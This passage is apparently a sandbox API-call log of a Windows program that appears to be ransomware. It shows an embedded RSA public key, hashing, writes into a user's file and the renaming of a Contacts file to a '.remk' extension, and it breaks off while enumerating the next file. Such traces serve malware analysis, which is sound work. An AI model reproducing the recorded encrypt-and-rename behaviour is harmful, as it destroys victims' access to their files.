KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0230.920] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x695278) returned 1 [0230.921] CryptCreateHash (in: hProv=0x695278, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0230.921] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0230.921] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0230.921] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0230.921] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0230.921] GetLastError () returned 0x0 [0230.921] SetLastError (dwErrCode=0x0) [0230.921] GetLastError () returned 0x0 [0230.921] SetLastError (dwErrCode=0x0) [0230.921] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.922] SetLastError (dwErrCode=0x0) [0230.922] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.923] SetLastError (dwErrCode=0x0) [0230.923] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] GetLastError () returned 0x0 [0230.924] SetLastError (dwErrCode=0x0) [0230.924] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0230.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0230.924] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0230.924] CryptDestroyHash (hHash=0x31de170) returned 1 [0230.924] CryptReleaseContext (hProv=0x695278, dwFlags=0x0) returned 1 [0230.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0230.925] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0230.925] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0230.925] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0230.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x490) returned 0x325fb40 [0230.925] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0230.925] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325d6d0 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b7460 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc50 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x31b74a8 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc20 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc80 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0230.925] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x65dd10 [0230.926] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x65dd10, Size=0x218) returned 0x325d8d8 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b1b70 [0230.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc80 | out: hHeap=0x630000) returned 1 [0230.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0230.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0230.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0230.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edbf0 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31edc80 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d69f0 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0230.926] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0230.926] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc80 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8d8 | out: hHeap=0x630000) returned 1 [0230.927] GetCurrentThreadId () returned 0x314 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x696d48 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x31a4298 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.927] GetCurrentThreadId () returned 0x314 [0230.927] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.927] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0230.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0230.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0230.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5968 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc98 [0230.928] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0230.928] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc80 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edbf0 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc38 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edcb0 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc68 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0230.929] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edd10 [0230.929] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edcc8 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31edd10 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc68 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc80 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31edc80 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325d8d8 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc98 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcc8 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x325dae8 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x31b6580 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0230.930] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0230.930] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc80 | out: hHeap=0x630000) returned 1 [0230.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b1b70 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0230.931] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325dae8 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edd10 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edcb0 | out: hHeap=0x630000) returned 1 [0230.931] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edbf0 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc38 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31edc20 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b74a8 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d8d8 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5968 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d69f0 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0230.932] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0230.932] WriteFile (in: hFile=0x640, lpBuffer=0x325fb40*, nNumberOfBytesToWrite=0x48e, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x325fb40*, lpNumberOfBytesWritten=0x3adfb14*=0x48e, lpOverlapped=0x0) returned 1 [0230.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0230.933] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0230.933] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0230.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0230.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711898 [0230.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0230.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0230.933] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x325d6d0 [0230.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0230.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711898 | out: hHeap=0x630000) returned 1 [0230.933] WriteFile (in: hFile=0x640, lpBuffer=0x325d6d0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x325d6d0*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0230.933] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d6d0 | out: hHeap=0x630000) returned 1 [0230.933] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0230.933] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0230.933] CloseHandle (hObject=0x640) returned 1 [0230.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x695278 [0230.937] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b1b70 [0230.937] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x695278 | out: hHeap=0x630000) returned 1 [0230.938] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.remk")) returned 1 [0230.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b70 | out: hHeap=0x630000) returned 1 [0230.967] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0230.967] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0230.969] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0230.969] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0230.969] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 